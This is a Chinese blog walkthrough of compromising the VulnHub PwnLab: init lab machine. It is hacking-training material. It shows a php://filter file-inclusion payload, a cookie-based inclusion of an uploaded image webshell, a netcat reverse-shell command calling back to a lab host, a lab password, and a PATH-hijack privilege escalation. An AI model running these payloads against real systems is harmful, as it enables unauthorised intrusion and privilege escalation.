Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >攻破VulnOS(3)之挑战PwnLad

攻破VulnOS(3)之挑战PwnLad

作者头像
lonelyvaf
发布于 2018-06-07 07:01:36
发布于 2018-06-07 07:01:36
1.2K0
举报

蛋疼的第三弹~~~,来了!

首先,安装完虚拟机,我们没有这个靶机的密码。也不知道ip,只能扫描一下内网或者探测了。

我在kali下用ipconfig看下我kali的地址,因为我的kali和靶机是同一个网卡。

然后再用 arp-scan 或者netdiscover扫描一下C类地址。

探测到,这个靶机的网址是101.

Ok大致的看一下,是自己写的一个cms。

我们用nmap进行半开扫描,nmap -sSVC -p-

发现了不少服务。

Apache 、mysql 、RPC

Ok,我们进一步在web页面收集信息。

发现,有login,upload,home等三个链接。

看到这串url是不是让你想起了,文件包含?因为虽然page这个是一个get参数,但是这里明显不可能是一个注入点。

假设我们这里的文件包含是这个代码:

Ok,那么我们为了进一步的信息探测,我们可以试试读取页面的源代码。

哈哈,用伪协议去爆出来:http://192.168.56.101/?page=php://filter/read=convert.base64-encode/resource=index

我们得到的base64加密后的源代码是:

PD9waHANCi8vTXVsdGlsaW5ndWFsLiBOb3QgaW1wbGVtZW50ZWyKew0KCWluY....xxxxx中间省略xxxxxx.....tbD4=

在下用小葵大杀器转换之,得:

这里我们发现了congig.php,我们同样去包含他。得到:

我们发现了他mysql数据库的用户密码。

经过一系列的操作,基础的sql查询语句我就不多说了。我们得到了下面这些信息:

发现数据库里面的pass是经过base64加密的。

我们前面包含登录框的时候也是base64加密的。哈哈,ok。我们解密玩

可以直接去登录了。

我们点击upload ,他说必须登录。那么我们有了之前的用户名,密码就可以直接登录。尝试上传木马,拿shell了。

这时候我们再次包含一下upload文件看看它有什么样的文件检测。同样base64转换之~

发现用白名单加上MIME加上重命名加上后缀名检测。基本上是无懈可击了。但是这里存在这文件包含,所以我就可以上传一个图片然后包含它。一句话?或者一个反弹shell的脚本!

然而我们这里发现包含文件的后缀名被固定死,用“?”截断?

哈哈,然而这里特殊的地方在于,

这里包含了一个cookie,又是一个包含漏洞。我们是不是可以通过抓包改包让cookie包含我们的图片shell呢?

用户:Kane pass: iSv5Ym2GRo 我们先登录。

先抓包上传我们的小马。

用cookie包含它,然后上传一个反弹shell的php马。

#Premier shell :

nc -l -p 1234

#Second shell :

curl http://192.168.56.101/upload/xxx.php?vaf=nc-c /bin/bash 192.168.56.102 1234

尝试用之前的用户登录,用VulnOS 挑战2的方法 python形成一个交互的shell。

我们发现了这个东西,用IDA静态分析,

代码的主要功能是非常明确的,二进制系统采用函数参数为:“cat/home/mike/msg.txt”

针对这种情况,我们可以通过设置bash的$path环境变量来利用,通常的$PATH包含

然而当我们调用cat命令的时候,cat会从以上目录来寻找,如果我们添加.到$PATH环境变量,则会先从当前目录来寻找cat指令:

新建cat,添加执行权限

kane@pwnlab:~$ echo "/bin/bash"> /tmp/cat

echo "/bin/bash" > /tmp/cat

kane@pwnlab:~$ chmod +x /tmp/cat

chmod +x /tmp/cat

kane@pwnlab:~$ PATH=/tmp:$PATH

PATH=/tmp:$PATH

kane@pwnlab:~$ ./msgmike

./msgmike

mike@pwnlab:~$ id

id

uid=1002(mike) gid=1002(mike)groups=1002(mike),1003(kane)

这样当我们再次运行./msgmike命令的时候,就会触发当前目录下的cat(/bin/sh),从而提权。

哈哈,ok。。几天没更新了。被论文搞傻的,这个是欠大家的~~~

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2016-12-16,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 晨星先生 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
VulnHub靶场 PwnLab: init 渗透测试思路
是个白名单验证只能上传图片马,然后使用index.php的文件包含漏洞getshell,这里需要登陆才能上传文件
曈曈too
2024/08/24
1611
VulnHub靶场 PwnLab: init 渗透测试思路
从Vulbhub-djinn靶机学习命令注入和Python input() 漏洞
靶机描述:Level: Beginner-Intermediate flags: user.txt and root.txt Description: The machine is VirtualBox as well asVMWare compatible. The DHCP will assign an IPautomatically. You'll see the IP right on the loginscreen. You have to find and read two flags (user androot) which is present in user.txt and root.txtrespectively. Format: Virtual Machine (Virtualbox - OVA) Operating System: Linux
Power7089
2019/12/12
8200
从Vulbhub-djinn靶机学习命令注入和Python input() 漏洞
黑客技能训练:攻破MrRobot
今天挑战的是Mr Robot。 首先在Nmap扫描之前提一个小技巧。 PPPOE宽带拨号环境下nmap不能直接使用,需要提升权限,要使用-e 参数加上网卡设备名 当前我使用的是无线宽带,通过无线网卡实
lonelyvaf
2018/06/07
8620
HTB:Charon渗透测试
靶机地址:https://www.hackthebox.eu/home/machines/profile/42
亿人安全
2022/08/30
7170
HTB:Charon渗透测试
靶机实战 |『VulnHub系列』Bottleneck 1-Walkthrough
发现这个img标签的src的值有点特别,对其进行base64解码,得到图片名称bottleneck_dontbe.png
Power7089
2019/11/09
2.1K0
靶机实战 |『VulnHub系列』Bottleneck 1-Walkthrough
Vulnhub Funbox4靶机渗透练习
使用gobuster工具继续对目录igmseklhgmrjmtherij2145236 、upload扫描
红队蓝军
2025/02/12
580
Vulnhub Funbox4靶机渗透练习
MinUv1靶机渗透
看链接以为是文件包含,试验了一下,都是403,估摸着是有waf拦截了,最后尝试了一下命令注入,发现可行
Elapse
2020/08/17
9140
【HTB系列】靶机Vault的渗透测试详解
We are proud to announce our first client: Sparklays (Sparklays.com still under construction)
Ms08067安全实验室
2019/09/25
9290
Vulnhub-DOUBLETROUBLE靶机渗透实战
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
网络安全自修室
2024/05/23
3120
Vulnhub-DOUBLETROUBLE靶机渗透实战
CTF挑战130分 | Rickdiculously 1.0
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。
FB客服
2018/07/30
1.2K0
CTF挑战130分 | Rickdiculously 1.0
vulnhub-Raven2
Raven 2是中级boot2root VM, 有4个flag需要搜集,在多次被攻破后,Raven Security 采取了额外的措施来加固其Web服务器,以防止黑客入侵。您是否仍然可以攻破Raven?
LuckySec
2022/11/02
6560
vulnhub-Raven2
【VulnHub】Raven: 2 靶机的渗透测试
4. 查看wordpress的wp-config.php配置文件得到数据库账号密码
Ms08067安全实验室
2019/10/15
1.4K0
【Vulnhub靶机系列】DC5
那说明下面这一块footer是另外一个文件加载的,如果是写死在网页里面的话不会出现这种情况
Ms08067安全实验室
2022/09/26
6140
VulnHub靶机学习——Eric
声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
Power7089
2019/11/25
1K0
记一次渗透后运用多种方式提权实战
近期在学习Linux提权,完成了vulnhub上的42challenge靶场。该靶场在web渗透阶段表现的中规中矩,但在获得shell后的提权过程中,表现很出色。提权题目设计的逻辑严谨(不会出现突然的脑洞让你卡住),注重基础知识的考察,要求的知识面也很广,涉及到密码破解、程序逆向分析、第三方应用提权、进程提权、ssh免密登录、Linux ACL访问控制权限等方面的知识,属于不可多得的精品之作,下面就开始这次靶场实战之旅。
FB客服
2021/03/24
1.9K0
VulnHub通关日记-DC_5-Walkthrough
DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
Gcow安全团队
2020/03/06
7880
Vulnhub靶机:DC-1
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,挑战的目标是获取操作系统的root权限和查看flag。
小简
2022/12/29
1.6K0
Vulnhub靶机:DC-1
vulnhub靶场之DC-8靶场实战(超详细)
访问网站首页,http://192.168.111.143/?nid=1,通过nid进行传参
红队蓝军
2024/08/14
4870
vulnhub靶场之DC-8靶场实战(超详细)
Vulhub系列:EVM 1
This is super friendly box intended for Beginner's This may work better with VirtualBox than VMware
Ms08067安全实验室
2019/12/02
8800
VulnHub靶场 DarkHole:1
目标靶机开启了22端口,运行版本号为OpenSSH 8.2p1的SSH服务;开启了80端口,http服务,其中间件为Apache/2.4.41。
潇湘信安
2023/03/10
9730
VulnHub靶场 DarkHole:1
相关推荐
VulnHub靶场 PwnLab: init 渗透测试思路
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档